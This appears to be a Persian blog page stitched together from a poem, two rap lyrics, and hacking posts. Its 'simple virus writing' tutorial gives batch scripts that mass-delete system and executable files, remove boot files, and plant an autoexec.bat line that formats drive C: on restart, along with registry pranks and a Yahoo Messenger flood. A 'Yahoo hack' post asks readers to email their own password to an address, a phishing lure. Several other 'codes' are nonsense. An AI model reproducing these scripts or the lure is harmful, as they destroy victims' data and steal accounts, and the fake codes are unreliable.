heloo hackers
heloo hackers

heloo hackers

هک یاهو افراد

یک ایمیل حاوی یوزر و بسورد خود به این ایمیل بزنیدین ایمیل برای خود یاهو میباشد)

y.get99@yahoo.com

بعد طی دو یا سه روز ایمیلی دریافت خواهید کرد که میتوانید با دوباره ارسال کردنiD ایمیل شخصی دیگر میتوانید رمز را در ان مشاهده کنید (نظر بدید)

سهراب-شعر

شب آرامی بود
می روم در ایوان، تا بپرسم از خود
زندگی یعنی چه؟
مادرم سینی چایی در دست
گل لبخندی چید ،هدیه اش داد به من
خواهرم تکه نانی آورد ، آمد آنجا
لب پاشویه نشست
پدرم دفتر شعری آورد، تکیه بر پشتی داد
شعر زیبایی خواند ، و مرا برد، به آرامش زیبای یقین
با خودم می گفتم
زندگی، راز بزرگی است که در ما جاریست
زندگی فاصله آمدن و رفتن ماست
رود دنیا جاریست
زندگی ، آبتنی کردن در این رود است
وقت رفتن به همان عریانی؛ که به هنگام ورود آمده ایم
دست ما در کف این رود به دنبال چه می گردد؟
هیچ !!!
زندگی ، وزن نگاهی است که در خاطره ها می ماند
شاید این حسرت بیهوده که بر دل داری
شعله گرمی امید تو را، خواهد کشت
زندگی درک همین اکنون است
زندگی شوق رسیدن به همان
فردایی است، که نخواهد آمد
تو نه در دیروزی، و نه در فردایی
ظرف امروز، پر از بودن توست
شاید این خنده که امروز، دریغش کردی
آخرین فرصت همراهی با، امید است
زندگی یاد غریبی است که در سینه خاک
به جا می ماند
زندگی ، سبزترین آیه ، در اندیشه برگ
زندگی، خاطر دریایی یک قطره، در آرامش رود
زندگی، حس شکوفایی یک مزرعه، در باور بذر
زندگی، باور دریاست در اندیشه ماهی، در تنگ
زندگی، ترجمه روشن خاک است، در آیینه عشق
زندگی، فهم نفهمیدن هاست
زندگی، پنجره ای باز، به دنیای وجود
تا که این پنجره باز است، جهانی با ماست
آسمان، نور، خدا، عشق، سعادت با ماست
فرصت بازی این پنجره را دریابیم
در نبندیم به نور، در نبندیم به آرامش پر مهر نسیم
پرده از ساحت دل برگیریم
رو به این پنجره، با شوق، سلامی بکنیم
زندگی، رسم پذیرایی از تقدیر است
وزن خوشبختی من، وزن رضایتمندی ست
زندگی، شاید شعر پدرم بود که خواند
چای مادر، که مرا گرم نمود
نان خواهر، که به ماهی ها داد
زندگی شاید آن لبخندی ست، که دریغش کردیم
زندگی زمزمه پاک حیات ست ، میان دو سکوت
زندگی ، خاطره آمدن و رفتن ماست
لحظه آمدن و رفتن ما ، تنهایی ست
من دلم می خواهد
قدر این خاطره را دریابیم

یاس-فریاد

میدونم که تو هم توی قلبت عقده هایی داری
عقده هایی که اومدن از نقطه های تاریک
تو مثل من دلت سوخت از نقره های داغی
که هک کرده اسم مارو نخبه های یاغی
الان 12 شبه از صبحه پای کاریم
بازم روبه رو شدیم با سفره های خالی
این حرفا شدن فقط مشتی گفته های عادی
توهم پری از این همه حفره های مادی
خیابونا پر از مشتی کاسب پست
پر از ادمای محتاج کاسه به دست
پر از آدمای خردمند تحصیل کرده
که زندگی انتحارو و بهش تحمیل کرده


پر از آدمای سخت کوش کارگر
که کاغذ فردای روشن رو پاره کرد
پر از کسی که دنبال پول کلی گشت
آخرم رسید به فروش کلیش

پر از اونا که سال ها خوندن درس های بدل
نا امید گذشتن از مرز های وطن
پر از بغضی که نترکید و اشک نشد
پر از استعداد هایی که کشف نشد
پر از اون کسایی که از خودی فریب خوردن
بعد یه گوشه تک و تنها و غریب مردن
پر از من تو و قصه ها و درد



از فریاد همینجا داد میزنم
میخونم و سکوتم و دار میزنم
من میمونم و سعودم و جار مینزم
جار میزنم و به اوج قصه ها میپرم
از فریاد همینجا داد میزنم
میخونم و سکوتم و دار میزنم
من میمونم و سعودم و جار مینزم
جار میزنم و به اوج قصه ها میپرم


پای حرف من بشین بگم چه زجه ها کشیدم
نسل ما چی دیدن قطره اشک ما چکیدن
مردمان بی غم درد مارو دیدن
بی رحم تر شدن بد به حال میهن
چه باید کرد از کی شکایت کرد
از این سرنوشت بد که من رو شکارم کرد؟
نه تقصیر از منه که بهش اجازه دادم
فکر میکردم یکی میاد برای نجات آدم

غافل از ایکه قلب ها پر از ترکشه
که باعث اینه چشمای تو تر بشه
غافل از اینکه هرکسی گرفتار دردشه
امیدوارم هر چی گره داره حل بشه
وقتی میبینی قیمت ها با قدم های حجومی
پیش میرن به سمت رقم های نجومی
تو مجبوری که به سقوطت پا بدی
چون که تو هنوزم اسیر حقوق ثابتی
یعنی تنها چیزی که سمت تو سرازیره درده
که تمام وجود تورو سراسیمه کرده
بهم بگو تو این مسیرا یه چراغی میتونه که این راه و روشن کنه؟
پس چه راهی میمونه؟

فقط فریاد
همینجا داد میزنم
میخونم و سکوتم و دار میزنم
من میمونم و سعودم و جار مینزم
جار میزنم و به اوج قصه ها میپرم

پاپ :
بیا با من دل و به دریا بزن
ححرف دلت و فریاد بزن
تو این تباهی تو این سیاهی
اینه درمان درد

فقط فریاد
همینجا داد میزنم
میخونم و سکوتم و دار میزنم
من میمونم و سعودم و جار مینزم
جار میزنم و به اوج قصه ها میپرم


صدام و داری؟ هر لحظه یه شروع تازه اس
هر شروع یه تولد دوباره اس

ویروس نویسی ساده

در این مقاله قصد دارم تا آموزش ساخت ویروس بدونه نیاز به برنامه های خاص و تنها با not pad ویندوز را به شما آموزش دهم.

 

نکته مهم : هرگز این ویروس ها را روی سیستم خود اجرا نکنید،چون من هیچ مسئولیتی را قبول نمی کنم!

*در کدهای زیر خط فاصله ها نیز جزو کد ویروس است.

باز کردن برنامه  notepad

به قسمت start بروید و allprpgrams را انتخواب کنید accessories رفته و در گزینه ها notepad را انتخواب کنید ((نظر هم بدید))

ساخت ویروس

 

1- مادر بورد

این ویروس در صورت اجرا کامپیوتر فرد را به کلی خراب میکند.

 طرز ساخت: note pad خود را باز کرده و کد پاین را در آن منتقل کنید.

@echo off
Cls

===========
Color fc
Del /a c:\*.com
Del /a c:\*.sys
Del /a c:\*.exe /s

===========
رادر آن کپی و پست کنید بعد به منوی فایل رفته وسیو از را انتخواب کنید ودر قسمت
filename اسم مورد نظر را نوشته و با پس bat بدهید مثل virus.bat و آن را ذخیره کنید.

Cpu-2

note pad خود را باز کنید سپس کد cpu_567hjkblaster را در آن کپی و پست کنید از منوی فایل سیو از را انتخواب کنید و در filename اسم مورد نظر را نوشته و با پسوند .bat ذخیره کنید مثل cpu.bat 

 

-3 هارد

 note pad خود را باز کرده و کد debug e30 o31 را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و به آن پسوند .bat بدهید مثل thebesthacker.bat و آن را ذخیره کنید.

-4 فیلتر گذار

 این ویروس در internet explore فیلتر گذاری میکنه و باعث از کار انداختن اون میشه و دیگه نمیشه به هیچ سایتی رفت . طرز ساخت : note pad خود را باز کرده و کدی را که نوشته شده است pouped-blocked-web-exploure-online&offline را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر خود را نوشته و به آن پسوند .bat بدهید مثل thebesthacker.bat بعد هم فایل را ذخیره کنید.

-5رسیت و بالا نیامدن ویندوز

 ابتدا Notepad ویندوز را باز کنید. سپس این عبارت زیر را در داخلش کپی کنید:del autoexec.bat del config.sys cd winnt del system.ini del win.ini
سپس به منوی فایل رفته و سیو از را انتخواب کنید ودر قسمت
filename اسم مورد نظر را نوشته و به آن پسوند .bat بدهید مثل thebesthacker.bat .

-6فرمت کردن یک درایو مشخص

ابتدا برنامه Notepad ویندوز را اجرا کنید ( Start/All Programs/Accessories )
سپس با استفاده از فرمان
Copy & Paste کدهای زیر را در محیط برنامه کپی کنید:
@
echo off
call attrib -r -h c:autoexec.bat > nul
echo @echo off > c:autoexec.bat
echo format /autotest c:/q > nul >> c:autoexec.bat
call attrib +r +h c:autoexec.bat > nul
exit
حال از منوی
File بر روی Save as کلیک کنید.
از منوی کشویی
Save as type گزینه All Files را برگزینید.
در قسمت
File Name عبارت txt.* را پاک کنید و به جای آن نام دلخواه خود را تایپ کرده و پسوند bat. را به انتهای آن اضافه کنید ، به طور مثال thebesthacker.bat
سپس مکان مورد نظر برای ذخیره فایل را مشخص کرده و روی دکمه
Save کلیک کنید.
اکنون فایل فرمت شما آماده است. کافی است یکبار پس از اجرای فایل ، سیستم
restart شود تا فایل فعال شود.

-7بوت کردن در یاهو 7 بدون نیاز به برنامه

 یاهو مسنجر را باز کنید در گزینه های بالا روی im کلیک کنید بعد از باز شدن به پوشه ی دوم بروید و id مورد نظر را نوشته و بعد از آن دوتا ++بزنید مثل ++thebesthacker بعد ok کنید بعدصفحه ای باز میشود مانند صفحه ی چت بعد 10 تا L در این صفحه و 10 L در صفحه ای که با فردی که id آن بدون ++ نوشته اید و در حال چت هستید بروید و10 L در آنجا نوشته و بفرستید این کار باید 4 یا 5 بار تکرار شود نکته:برای نوشتن 10 L هر L را جدا گانه بنویسید (( L بعد اینتر _ L بعد اینتر و...)) بعد از این کار 50_60 صفحه در کامپیوتر فرد باز میشود و فرد دیسکانکت میشود توجه داشته باشید که یاهو شما و فرد مقابل باید 7 باشد.

 

-8ویروس بلستر

این ویروس در صورت اجرا شدن کامپیوتر فرد را restart میکند طرز ساختن ویروس: note pad را باز کرده و کد shotdown -a را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و با پسوند .bat ذخیره کنید مثل blester.bat 

-9 پر کردن هارد

: این ویروس هارد را پر میکند و دیگر هیچ بازی و برنامه ای نصب نمیشود طرز ساخت ویروس: note pad خود را باز کرده و کد c/windows/system32/jefo/display/memory/full را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید و در قسمت filename اسم مورد نظر را نوشته و به آن پسوند .bat بدهید مثل memory.bat بعد ذخیره کنید .

-10ساخت ویروس ficker

این ویروس بعد از نصب بر ریجستر اثر میگذارد و باعث میشود با فشار دادن هر دکمه ای از کیبورد کیس 2 صدای بوق بدهد و مانیتور چشمک بزند طرز ساخت: note pad خود را باز کرده و در آن کد:
Windows Registry Editor Version 5.00
[
HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"
Flags"="127"
[
HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"
Flags"="3"
"
WindowsEffect"="3
را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت
filename نام مورد نظر را نوشته و به آن پسوند .reg بدهید مثل ficker.reg در آخر هم ذخیره کنید برای غیر فعال کردن آن مانند بالا عمل کنید ولی این بار این کد هارا زده و همان کارها را بکنید وذخیره کنیدWindows Registry Editor Version 5.00
[
HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"
Flags"="126"
[
HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"
Flags"="2"
"
WindowsEffect"="0

یاس-سرباز وطن

خودتو بده به دست تکستم
یه لحظه بگذر
از فکر و ذکر و مشغله
و برو به سمت حسم
سر تکون بده حالا با بیت اوزی
یکم برو تو حس و حال و فاز و ریتم موزیک
که درد ورق قلم هدف همش ربط خاصی
دارن به اوج و رشد و پیشرفت رپ فارسی
من و تو باید تا ته تو صحنه وایستیم
میدونم اینو تو هم موافق با حرف یاسی
من میخوام تو مخ برم یه کمی هرج و مرج کنم
درد و رنج من به سبک رپ ترجمش کنم
درس و مشق من نوشتن است از تو از خودم
توپس بذار که رپ کنم از عمق درد مردمم
خوب؟؟؟
میدونی من مصر رو گفته های پیشم
دشمنای ما دلیل افت ما نمیشن
خفته های دیشب حالا بیدار ترینن
همه در ها قفل بود من از دیوار پریدم
هم خوان:
ببین دستم این قصه ها رو مینویسه میگه
با یه خودکار که عین تیغ تیزه اینه
که مینویسه دیگه از کینه ای که پیره
ولی به سمت پیشرفت سینه خیز میره
صدامو داری؟ یاس مینویسه میگه
با خودکاری اینه تیغ تیزه هی
که مینویسه دیگه از کینه ای که پیره
هی به سمت پیشرفت سینه خیز میره
ورس۲:
رحمت به اون کسیکه پشتمه تو بشمار
لعنت به اون کسیکه دشمنه تو بشمار
رپ نردبون رشدمه تو چشمام
مقصد که توی مشتمه به اجبار
هستم تو شوک روز های قدیمو
ولی هنوزم میکنم شکر اوستی کریمو
هنوز کلمه ها رو مینویسمو صداقت چون
یه لحظه واستا بینم انگار صدا قطع شد
اوزی؟ !!!….
مهم نیست بدون بیت میریم من و تو
ببین٬ تو وقتی پایه باشی واسه پای من
بیت زود خودشو میرسونه با صدای من
ما بچه های زیرزمینی
زجه ها رو میزنیم
حرف ما رو میشنویمو
تک ستاره میشویم
سبک برتر من تخته کردم
در ها رو حتی سقف رو کندم تا صدر جدول
بشینم
بشینم کنارت
بچینم ستاره
من میدم ادامه
و اینم صدامه
که میرقصه با تو
قلم میلغزه تا صبح
آره این درس ما شد
پس تو این لحظه پاشو
واسه ؛جنگ به دنبال حسّ و حال نگَرد
چونکه اونکه برد هیچ وقت استخاره نکرد
توی حال و سال خوبی مثل سال ۹۰
همه دستا میره بالا به افتخار وطن
هم خوان:
ببین دستم این قصه ها رو مینویسه میگه
با یه خودکار که عین تیغ تیزه اینه
که مینویسه دیگه از کینه ای که پیره
ولی به سمت پیشرفت سینه خیز میره
صدامو داری؟ یاس مینویسه میگه
با خودکاری اینه تیغ تیزه هی
که مینویسه دیگه از کینه ای که پیره
هی به سمت پیشرفت سینه خیز میره
ورس۳:
پشتکار من رشد کار من
تو پشتیبان من خوش به حال من
ما گشنه های حرف مرده کشته های رپ
با کلمه هایی گرونتر از بشکه های نفت
ت بده
توتحت تحریم و تحت تعقیب
ب بده
با بد ترین بلا ها باس بجنگیم
م بده
ما مست و منگیم مثل مرگ مغزی
ره به ره
قلم به دستیم قسم به نسلی
که پا به پاشون روز هایی که سوخت دادیم
از جنس همیم همدیگرو دوست داریم
عرقته به رنگ پرچمت به سرزمینت
که قرمزه سفید و سبزه منم از صمیم
قلبم هستم تا توی دنیا صدام بپیچه
یاس تو اوج درد همینجا ادامه میده
ایران مهم نیست به دست کی اداره میشه
آدم همیشه تو محدودیت ها ستاره میشه
هم خوان:
ببین دستم این قصه ها رو مینویسه میگه
با یه خودکار که عین تیغ تیزه اینه
که مینویسه دیگه از کینه ای که پیره
ولی به سمت پیشرفت سینه خیز میره
صدامو داری؟ یاس مینویسه میگه
با خودکاری اینه تیغ تیزه هی
که مینویسه دیگه از کینه ای که پیره
هه به سمت پیشرفت سینه خیز میره